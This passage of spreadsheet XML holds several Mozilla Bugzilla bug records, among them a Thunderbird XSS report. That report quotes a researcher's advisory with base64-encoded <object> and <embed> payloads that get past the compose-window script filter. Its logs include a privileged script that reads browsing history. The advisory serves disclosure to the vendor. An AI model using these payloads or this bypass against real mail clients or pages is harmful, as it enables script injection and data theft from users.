      <c r="O3592" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3592" t="inlineStr">
        <is>
          <t>p=</t>
        </is>
      </c>
      <c r="Q3592" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3592" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3592" t="inlineStr">
        <is>
          <t>2013-04-04</t>
        </is>
      </c>
      <c r="T3592" t="n">
        <v>1</v>
      </c>
      <c r="U3592" t="n">
        <v>0</v>
      </c>
      <c r="V3592" t="n">
        <v>9</v>
      </c>
      <c r="W3592" t="inlineStr">
        <is>
          <t>Created attachment 729288
log file
Tester is already logged into marketplace
steps to reproduce:
1. Set the Language on your unagi phone = Spanish
2. Start the purchase flow for a paid app on your unagi phone
3. Enter your PIN
4. Confirm your mobile number and enter the bango PIN
5. In the Confirm your purchase screen, click on the Buy button
expected behavior:
purchase is successful
observed behavior:
purchase fails with a 400 error when language = Spanish (region is still US)
NOTE: purchase was successful when language on the phone was set to English.</t>
        </is>
      </c>
      <c r="X3592" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3593">
      <c r="A3593" t="n">
        <v>714600</v>
      </c>
      <c r="B3593" t="inlineStr">
        <is>
          <t>2012-01-02 03:45:47 -0800</t>
        </is>
      </c>
      <c r="C3593" t="inlineStr">
        <is>
          <t>Assertion failure: [infer failure] Missing type pushed 0: [0xf6c001c0], at jsinfer.cpp:349</t>
        </is>
      </c>
      <c r="D3593" t="inlineStr">
        <is>
          <t>2013-03-11 09:04:31 -0700</t>
        </is>
      </c>
      <c r="E3593" t="n">
        <v>1</v>
      </c>
      <c r="F3593" t="n">
        <v>1</v>
      </c>
      <c r="G3593" t="n">
        <v>3</v>
      </c>
      <c r="H3593" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3593" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3593" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3593" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3593" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3593" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3593" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3593" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3593" t="inlineStr">
        <is>
          <t>[sg:critical][qa+:ashughes] [jsbugmon:verify-branch=mozilla-aurora,verify-branch=mozilla-beta,ignore]</t>
        </is>
      </c>
      <c r="Q3593" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3593" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3593" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T3593" t="n">
        <v>1</v>
      </c>
      <c r="U3593" t="n">
        <v>0</v>
      </c>
      <c r="V3593" t="n">
        <v>19</v>
      </c>
      <c r="W3593" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision d98fbf3cbd71 (options -m -n):
var UBound = 0;
var actual = '';
var actualvalues = [];
var expect= '';
var expectedvalues = [];
function addThis() {
  actualvalues[UBound] = actual;
  expectedvalues[UBound] = expect;
  UBound++;
}
function testLengthOnNonNativeProto() {
  var o2 = {};
  o2.__proto__ = [];
  for (var j = 0; j &lt; 5; (({})[addThis()]))
    o2.length;
}
assertEq(testLengthOnNonNativeProto(), "no assertion");
S-s due to previous infer failures being security-relevant.</t>
        </is>
      </c>
      <c r="X3593" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3594">
      <c r="A3594" t="n">
        <v>1582844</v>
      </c>
      <c r="B3594" t="inlineStr">
        <is>
          <t>2019-09-20 13:54:33 -0700</t>
        </is>
      </c>
      <c r="C3594" t="inlineStr">
        <is>
          <t>[Experiment] Pref-Flip Experiment: activity-stream-pktnewtabH22019-70-personalization-test Fx 69.0 Release</t>
        </is>
      </c>
      <c r="D3594" t="inlineStr">
        <is>
          <t>2019-11-05 09:42:53 -0800</t>
        </is>
      </c>
      <c r="E3594" t="n">
        <v>1</v>
      </c>
      <c r="F3594" t="n">
        <v>1</v>
      </c>
      <c r="G3594" t="n">
        <v>5</v>
      </c>
      <c r="H3594" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3594" t="inlineStr">
        <is>
          <t>Shield</t>
        </is>
      </c>
      <c r="J3594" t="inlineStr">
        <is>
          <t>Shield Study</t>
        </is>
      </c>
      <c r="K3594" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3594" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3594" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3594" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3594" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3594" t="inlineStr"/>
      <c r="Q3594" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3594" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3594" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3594" t="n">
        <v>1</v>
      </c>
      <c r="U3594" t="n">
        <v>0</v>
      </c>
      <c r="V3594" t="n">
        <v>2</v>
      </c>
      <c r="W3594" t="inlineStr">
        <is>
          <t>activity-stream-pktnewtabH22019-70-personalization-test
Pocket New Tab study to measure the impact of Personalization on SPOC performance.
Experimenter is the source of truth for details and delivery. Changes to Bugzilla are not reflected in Experimenter and will not change delivery configuration.
More information: https://experimenter.services.mozilla.com/experiments/activity-stream-pktnewtabh22019-70-personalization-test/</t>
        </is>
      </c>
      <c r="X3594" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3595">
      <c r="A3595" t="n">
        <v>875818</v>
      </c>
      <c r="B3595" t="inlineStr">
        <is>
          <t>2013-05-24 09:33:58 -0700</t>
        </is>
      </c>
      <c r="C3595" t="inlineStr">
        <is>
          <t>HTML compose window XSS via &lt;object&gt; tag on Reply/Forward ("wiretap" is back)</t>
        </is>
      </c>
      <c r="D3595" t="inlineStr">
        <is>
          <t>2024-05-30 08:03:20 -0700</t>
        </is>
      </c>
      <c r="E3595" t="n">
        <v>1</v>
      </c>
      <c r="F3595" t="n">
        <v>1</v>
      </c>
      <c r="G3595" t="n">
        <v>3</v>
      </c>
      <c r="H3595" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3595" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J3595" t="inlineStr">
        <is>
          <t>Composition</t>
        </is>
      </c>
      <c r="K3595" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3595" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3595" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3595" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3595" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3595" t="inlineStr">
        <is>
          <t>[CVE-2013-6674 in bug 868267]</t>
        </is>
      </c>
      <c r="Q3595" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3595" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3595" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3595" t="n">
        <v>1</v>
      </c>
      <c r="U3595" t="n">
        <v>0</v>
      </c>
      <c r="V3595" t="n">
        <v>28</v>
      </c>
      <c r="W3595" t="inlineStr">
        <is>
          <t>Title:
======
Mozilla Thunderbird - 17.0.6 - Base URI Filter Bypass &amp; Persistent Script Code Injection Vulnerability
Date:
=====
2013-05-21
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=953
VL-ID:
=====
953
Common Vulnerability Scoring System:
====================================
3.9
Introduction:
=============
Thunderbird is a free, open-source, cross-platform application for managing email and news feeds. It is a local (rather than a web-based) email application that is powerful yet easy-to-use. Thunderbird has lots of cool features. Thunderbird gives you control and ownership over your email. There are lots of add-ons available for Thunderbird that enable you to extend and customize your email experience. Thunderbird is part of the Mozilla Manifesto, a pledge that describes Mozilla`s commitment to an open, accessible, egalitarian Internet.
Vendor Homepage: http://www.mozilla.org
Product website: http://www.mozilla.org/en-US/thunderbird/
Abstract:
=========
An independent vulnerability lab researcher discovered a filter bypass and persistent validation vulnerability in the Mozilla Thunderbird Email Software.
Report-Timeline:
================
2013-05-10: Researcher Notification &amp; Coordination (Ateeq Khan)
2013-05-11: Vendor Notification (Mozilla - Security Incident Team)
2013-00-00: Vendor Response/Feedback (Mozilla - Security Incident Team)
2013-00-00: Vendor Fix/Patch (Mozilla - Developer Team)
2013-00-00: Public Disclosure (Vulnerability Laboratory)
Status:
========
Unpublished
Affected Products:
==================
Mozilla
Product: Thunderbird - EMail Application 17.0.6
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
It has been discovered that the security controls / filters currently being used in Mozilla Thunderbird application can be easily evaded if an attacker decides to encrypt the payloads with base64 encryption and combine it with the &lt;object&gt; tag. During the testing, it was initially noticed that malicious javascript tags were being filtered / blocked in the Thunderbird application however, Attaching a debugger with the Thunderbird .exe file revealed some very interesting information and gave much better insight behind the actual working of the application. Most of the information revealed is Javascript errors which gave the researcher much hope in believing that the application might actually be vulnerable.
By default, HTML tags like &lt;script&gt; and &lt;iframe&gt; are blocked in Thunderbird and get filtered immediately upon insertion however, While drafting a new email message, attackers can easily bypass the current input filters by encoding their payloads with base64 encryption and using the &lt;object&gt; tag and insert malicious scripts / code eg. (script / frame) within the emails and send it to the victims. The exploit gets triggered once the victim decides to reply back and clicks on the \'Reply\' or \'Forward\' Buttons.
After successfully bypassing the input filters, an attacker can inject persistent script code while writing a new email and send it to victims. Interestingly the payload gets filtered during the initial viewing mode however if the victim clicks on Reply or Forward, the exploit gets executed successfully. For a POC i will be including multiple examples in this advisory for your review. I was able to run multiple scripts generating strange behaviour on the application which can be seen in the debugging errors which I have attached along with this report.
These sort of vulnerabilities can result in multiple attack vectors on the client end which may eventually result in complete compromise of the end user system. The persistent code injection vulnerability is located within the main application.
Exploitation of this persistent application vulnerability requires a low or medium user interaction. Successful exploitation of the vulnerability may result in malicious script code being executed in the victims browser resulting in script code injection, persistent phishing, Client side redirects and similar client side attacks.
Vulnerable Service(s):
			[+] Mozilla Thunderbird 17.0.6 - Latest Release 
Vulnerable Section(s):
			[+] Write (Create a new message)
			[+] Email Signature (Account Settings)
			[+] Attach File with Signature as HTML (Account Settings)
Proof of Concept:
=================
For successful exploitation of this bug, the attacker needs follow the following steps:
a) Create a new email message
b) In the body text, insert new HTML tag with the POC "Payload"
c) Send the email to the victim
d) Open the new email in the victim browser and click Reply
e) You should now see a Javascript Application popup window proving the existence of this vulnerability.
Proof of Concept #2
-------------------
a) Goto Tools and then Account Settings
b) Under the Signature Text, insert the Payload and enable 'Use HTML'
c) Close the menu and Click on "Write" to create a new email
d) You should get a popup the moment new Email editor window opens up proving the existence of this vulnerability.
Proof of Concept #3
-------------------
a) Create a new text file on your desktop (local computer) and insert the POC payload in it and save it as test.html (HTML)
b) Goto Tools and then Account Settings
c) Below the Signature Text box, enable 'Attach the signature from a file instead'  
d) Click Choose and select the 'test.html' file which you created in step a.
e) Click on Write and you should be able to see the Javascript popup proving the existence of this vulnerability.
Payload #1
----------
&lt;object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24t
UE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=
"&gt;&lt;/object&gt;
Payload #2
----------
&lt;EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov
L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5
L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIk1vemlsbGEt
VGh1bmRlcmJpcmQtU2NyaXB0LUNvZGUtSW5qZWN0aW9uLVBPQy1BdGVlcS1LaGFuIik7PC9zY3Jp
cHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"&gt;&lt;/EMBED&gt;
1.3 
POC Technical Description:
--------------------------
Here, we used the data URI payload as a value assigned to the ëdataí attribute of the ëobjectí tag. The &lt;object&gt; tag is used to include objects such as images, audio, videos, Java applets, ActiveX, PDF, and Flash. The ëdataí attribute of the object tag defines a URL that refers to the object's data. Data in the "data:" URI is encoded as a base64 string:
Base64-encoded payload: PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=
Base64-decoded payload: &lt;script&gt;alert("Mozilla-Thunderbird-Script-Code-Injection-POC-Ateeq-Khan");&lt;/script&gt;
When the browser loads the object tag, it loads an object (in our case, itís a javascript) assigned to its data attribute. This causes execution of our javascript. We were able to bypass the application blacklist filter because of the base64-encoded payload. 
1.4
Email Header showing the hidden malicious payload
-------------------------------------------------
Message-ID: &lt;5195AABB.9000409@ccure.it&gt;
Date: Fri, 17 May 2013 08:57:47 +0500
From: Ateeq Khan &lt;ateeq@ccure.it&gt;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20130509 Thunderbird/17.0.6
MIME-Version: 1.0
To: ateeq &lt;ateeq@ccure.it&gt;
Subject: Test
X-Enigmail-Version: 1.5.1
Content-Type: multipart/alternative;
 boundary="------------070707070308040102070208"
X-Provags-ID: V02:K0:x1sxyB72JjArK0t7OpMGlUdnbY0vjneQvJdkX/twIfw
 QgzRaY5JN/SeFJ/fl2yULg+LJCKojYYGFR/8wrcS9hv6B6WWrN
 mur6d1IsxEn2D2kZt5fQ3tk8Z1qDiEpN5C7vrtOyEFAMJR3NHg
 jsL6elL9oxDkDRj1rYWvipndH1vonoPT3kjbcmuPsEZwYZ0JkL
 BjvA5CQE3qDMPgd5nzdT8SqKBRrj9u7m/irxCWHeJcnAG0XBnK
 txadh05EhpYjzrsz2kd+EyQe8ABh9F+yHQs6PBgIJeMDhm3EmY
 KPDb5TDHAsnDSD7e3jSaj1t/jhHWc4OA+Okkw+PsyBasdNvzw=
 =
X-UI-Junk: AutoNotJunk -999 (UWL);
  V01:9SSPrMSv:3OJduITnBKJW2sO9FDRIJW8REKQH86F2DhxLUWcUUFzS1g0JhJ7
  GgRkniiwfqYstxpjhSj957gz/8tEx07A4XeXZriK0TD0WhS1DXezTz/TtZsDYDEh
  hoWYOFl3bb5yC2QDLQsFZpUW8W11Q1ueL83Jxhvv1UmeH1zGnYFLHhAFOpzxH4jN
  652vXWc8dXjmX/WjTrvcI6NDjWdTTTfnDoO2PVFxLR+Tspu5HEv+SDuyrKv18Pei
  ogK+aeYsHnGw+Sv4tyfEE3I/nLbDefudGihBnld6s0loLxOOAGeIYxOeZ4Je+v0h
  MH9Y6ICIP7qvG/CkWt1PYQDzeNRPMANzlOgD/c//0kMjpKd6GwFWZIgfLyEFGGGA
  5ghpw5skyHXrAcf+FBq4ayJpL2UIfGeghWw==
X-Nemesis-Spam: whitelist
Envelope-To: ateeq@ccure.it
This is a multi-part message in MIME format.
--------------070707070308040102070208
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
-- 
--------------070707070308040102070208
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
&lt;html&gt;
  &lt;head&gt;
    &lt;meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"&gt;
  &lt;/head&gt;
  &lt;body text="#000000" bgcolor="#FFFFFF"&gt;
    &lt;object
data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=
      "&gt;&lt;/object&gt;
    &lt;div class="moz-signature"&gt;-- &lt;br&gt;
      &lt;script&gt;alert(1)&lt;/script&gt;&lt;/div&gt;
  &lt;/body&gt;
&lt;/html&gt;
--------------070707070308040102070208--
1.5
Interesting Raw Application Logs captured during the entire process of testing:
-------------------------------------------------------------------------------
(4fbc.3828): Break instruction exception - code 80000003 (first chance)
eax=fff82000 ebx=00000000 ecx=00000000 edx=7792f85a esi=00000000 edi=00000000
eip=778a000c esp=0ffffd94 ebp=0ffffdc0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!DbgBreakPoint:
778a000c cc              int     3
0:040&gt; g
[JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:2498
@resource:///components/nsSearchService.js:3476
_adjustAcItem@chrome://messenger/content/webSearch.xml:42
@chrome://messenger/content/webSearch.xml:22
" {file: "resource:///components/nsSearchService.js" line: 2499}]
[JavaScript Error: "2013-05-18 06:02:42	gloda.datastore	ERROR	Async queryFromQuery error: 1: malformed MATCH expression: 
["&lt;EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
" {file: "resource:///modules/gloda/log4moz.js" line: 687}]
2013-05-18 06:02:42	gloda.datastore	ERROR	Async queryFromQuery error: 1: malformed MATCH expression: 
["&lt;EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
[JavaScript Error: "2013-05-18 06:02:42	gloda.datastore	ERROR	Async queryFromQuery error: 1: malformed MATCH expression: 
["&lt;EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
" {file: "resource:///modules/gloda/log4moz.js" line: 687}]
2013-05-18 06:02:42	gloda.datastore	ERROR	Async queryFromQuery error: 1: malformed MATCH expression: 
["&lt;EMBED" "SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov,L3d3dy53My5vcmcvMjA
wMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5"]
[JavaScript Error: "An error occurred executing the cmd_insertHTMLWithDialog command: [Exception... 
"Could not convert Native argument arg 3 [nsIDOMJSWindow.openDialog]"  nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)"  
location: "JS frame :: chrome://editor/content/ComposerCommands.js :: &lt;TOP_LEVEL&gt; :: line 2790"  data: no]" 
{file: "chrome://global/content/globalOverlay.js" line: 95}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" 
line: 1736}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" 
line: 1736}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/folderDisplay.js" line: 2342}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/folderDisplay.js" line: 2342}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." 
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" 
line: 1736}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" 
line: 1736}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." 
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messenger.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messenger.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/folderDisplay.js" line: 1621}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." 
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://global/content/bindings/toolbar.xml" line: 276}]
"chrome://global/content/bindings/general.xml" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
No chrome package registered for chrome://navigator/content/navigator.xul
[JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64,
PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlByaXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nlc3MiKTsKZm9
yICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50LndyaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmlsZWdlTWFuYW
dlci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
No chrome package registered for chrome://navigator/content/navigator.xul
[JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64,
PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlByaXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nlc3MiKTsKZm9y
ICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50LndyaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmlsZWdlTWFuYWdl
ci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}]
[JavaScript Error: "An error occurred executing the cmd_insertHTMLWithDialog command: [Exception... "Could not convert Native argument arg 3 
[nsIDOMJSWindow.openDialog]"  nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)"  location: "JS frame :: chrome://editor/content/ComposerCommands.js 
:: &lt;TOP_LEVEL&gt; :: line 2790"  data: no]" {file: "chrome://global/content/globalOverlay.js" line: 95}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
Security Error: Content at moz-nullprincipal:{37db781d-d6d3-44bb-ade4-a79dcc63c0dd} may not load or link to about:blank.
Security Error: Content at moz-nullprincipal:{44bab10a-4bd8-4cfb-a519-eb2535344039} may not load or link to about:blank
[JavaScript Error: "[Exception... "'DB failed getting form autocomplete values' when calling method: [nsIFormAutoComplete::autoCompleteSearch]"  
nsresult: "0x8057001e (NS_ERROR_XPC_JS_THREW_STRING)"  location: "&lt;unknown&gt;"  data: no]"]
[JavaScript Error: "aSubject.popup is undefined" {file: "resource:///modules/glodaWebSearch.js" line: 68}]
[JavaScript Warning: "The stylesheet data:,*%7bx:&lt;script&gt;alert(1)&lt;/script&gt;askjn&lt;/h1&gt;expression(write(2))%7D was loaded as CSS even though its MIME type, 
"text/plain", is not "text/css"." {file: "about:blank" line: 0}]
[JavaScript Warning: "Unknown property 'x'.  Declaration dropped." {file: "data:,*%7bx:&lt;script&gt;alert(1)&lt;/script&gt;askjn&lt;/h1&gt;expression(write(2))%7D" line: 1]
[JavaScript Error: "GenericSendMessage FAILED: [Exception... "Component returned failure code: 0x8055311a [nsIMsgCompose.SendMsg]"  
nsresult: "0x8055311a (&lt;unknown&gt;)"  location: "JS frame :: chrome://messenger/content/messengercompose/MsgComposeCommands.js :: GenericSendMessage :: 
line 2814"  data: no]" {file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 2817}]
"chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "Use of attributes' nodeValue attribute is deprecated. Use value instead." 
{file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 3996}]
Security Error: Content at moz-nullprincipal:{549c3f5a-560d-4469-9b0f-09f598998b0b} may not load or link to about:blank.
Security Error: Content at moz-nullprincipal:{63e416e7-9cc4-458f-b93d-882bb2ad9121} may not load or link to about:blank.
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." 
{file: "chrome://global/content/bindings/general.xml" line: 0}]
[JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:2498
@resource:///components/nsSearchService.js:3476
_adjustAcItem@chrome://messenger/content/webSearch.xml:42
@chrome://messenger/content/webSearch.xml:22
-----------------------------------------------------------------------------
[JavaScript Warning: "The stylesheet data:,*%7bx:&lt;script&gt;alert(1)&lt;/script&gt;askjn&lt;/h1&gt;expression(write(2))%7D 
was loaded as CSS even though its MIME type, "text/plain", is not "text/css"." {file: "about:blank" line: 0}]
stylesheet was loaded successfully as text/plain even though it should have been.
Risk:
=====
The security risk of the persistent input validation vulnerabilities are estimated as medium(+).
Credits:
========
